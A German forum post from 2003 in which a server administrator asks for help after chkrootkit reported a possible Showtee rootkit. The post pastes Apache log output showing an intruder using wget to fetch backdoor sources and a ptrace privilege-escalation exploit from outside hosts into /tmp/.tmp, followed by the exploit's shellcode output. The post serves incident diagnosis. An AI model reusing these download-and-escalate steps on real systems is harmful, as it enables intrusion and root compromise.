Showtee Rootkit Hacker Angriff
Posted: 2003-08-04 22:12
Hallo :-)
Diese Einträge habe ich in den Apache logs gefunden:
Kann mir jemand erklären was da abgeht?
Habe gestern den Server in den Auslieferungszustand zurückversetzen lassen.
Das Chrootkit hatte etwas gefunden:
Checking `ifconfig'... INFECTED
Searching for Showtee... Warning: Possible Showtee Rootkit installed
Scheinbar geht das selbe Spiel heute wieder von vorne los.
Wo kann ich mehr Infos finden?
Wäre für jede Hilfe dankbar!
Diese Einträge habe ich in den Apache logs gefunden:
Code: Select all
[Mon Aug 4 17:12:54 2003] [error] System: Invalid argument (errno: 22)
--17:21:59-- http://members.xoom.it/merlotx/back.c
=> `/tmp/.tmp/backwget.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--17:21:59-- http://members.xoom.virgilio.it/merlotx/back.c
=> `/tmp/.tmp/backwget.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,282 [text/plain]
0K -> . [100%]
17:21:59 (1.22 MB/s) - `/tmp/.tmp/backwget.c' saved [1282/1282]
--17:21:59-- http://members.xoom.it/merlotx/back20.c
=> `/tmp/.tmp/back30.c'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back20.c [following]
--17:21:59-- http://members.xoom.virgilio.it/merlotx/back20.c
=> `/tmp/.tmp/back30.c'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,335 [text/plain]
0K -> . [100%]
17:21:59 (1.27 MB/s) - `/tmp/.tmp/back30.c' saved [1335/1335]
--17:21:59-- http://members.xoom.it/merlotx/tty
=> `/tmp/.tmp/ttywget'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/tty [following]
--17:21:59-- http://members.xoom.virgilio.it/merlotx/tty
=> `/tmp/.tmp/ttywget'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 19,472 [text/plain]
0K -> .......... ......... [100%]
17:22:04 (16.68 KB/s) - `/tmp/.tmp/ttywget' saved [19472/19472]
--17:22:04-- http://packetstormsecurity.nl/0304-exploits/myptrace.c
=> `/tmp/.tmp/myptrace.c'
Connecting to packetstormsecurity.nl:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 6,296 [text/plain]
0K -> ...... [100%]
17:22:04 (323.60 KB/s) - `/tmp/.tmp/myptrace.c' saved [6296/6296]
--17:22:04-- http://members.xoom.it/merlotx/trace
=> `/tmp/.tmp/trace'
Connecting to members.xoom.it:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/trace [following]
--17:22:04-- http://members.xoom.virgilio.it/merlotx/trace
=> `/tmp/.tmp/trace'
Connecting to members.xoom.virgilio.it:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 19,783 [text/plain]
0K -> .......... ......... [100%]
17:22:05 (95.64 KB/s) - `/tmp/.tmp/trace' saved [19783/19783]
-> Parent's PID is 27174. Child's PID is 27175.
-> Attaching to 27176...
-> Got the thread!!
-> Something wrong and it timeout.
[+] Attached to 27180
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x400116cd
[+] Now wait for suid shell...
[-] Unable to attach: Operation not permitted
Habe gestern den Server in den Auslieferungszustand zurückversetzen lassen.
Das Chrootkit hatte etwas gefunden:
Checking `ifconfig'... INFECTED
Searching for Showtee... Warning: Possible Showtee Rootkit installed
Scheinbar geht das selbe Spiel heute wieder von vorne los.
Wo kann ich mehr Infos finden?
Wäre für jede Hilfe dankbar!